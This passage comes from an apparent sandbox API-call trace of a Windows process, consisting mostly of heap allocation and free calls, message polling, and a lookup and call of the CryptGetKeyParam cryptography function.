lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0162.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0162.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0162.334] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0162.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0162.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0162.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0162.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0162.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0162.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0162.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0162.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0162.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0162.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0162.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0162.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0162.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0162.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0162.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0162.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0162.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0162.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0162.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0162.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0162.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0162.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0162.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0162.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.335] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0162.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0162.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0162.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0162.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0162.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0162.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0162.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0162.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0162.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0162.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0162.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0162.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0162.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0162.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0162.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0162.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0162.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0162.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0162.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0162.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0162.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0162.336] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0162.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0162.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0162.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0162.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0162.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0162.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0162.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0162.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0162.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0162.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0162.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.337] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0162.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0162.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd900 [0162.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0162.337] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0162.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0162.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0162.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0162.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0162.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0162.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0162.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0162.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0162.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0162.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0162.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0162.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0162.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0162.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0162.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0162.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0162.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0162.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0162.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0162.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0162.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0162.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0162.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0162.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0162.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0162.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0162.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0162.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0162.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0162.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0162.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0162.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0162.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0162.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0162.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0162.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0162.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0162.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0162.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0162.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0162.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0162.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0162.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0162.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0162.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0162.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0162.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0162.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0162.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0162.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0162.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0162.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0162.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0162.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0162.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0162.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0162.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0162.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0162.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0162.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0162.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0162.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0162.340] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0162.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0162.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0162.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0162.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0162.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0162.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0162.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0162.341] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0162.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0162.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0162.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0162.342] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c26f8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26f8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0162.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0162.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0162.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0162.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0162.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0162.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0162.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0162.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) 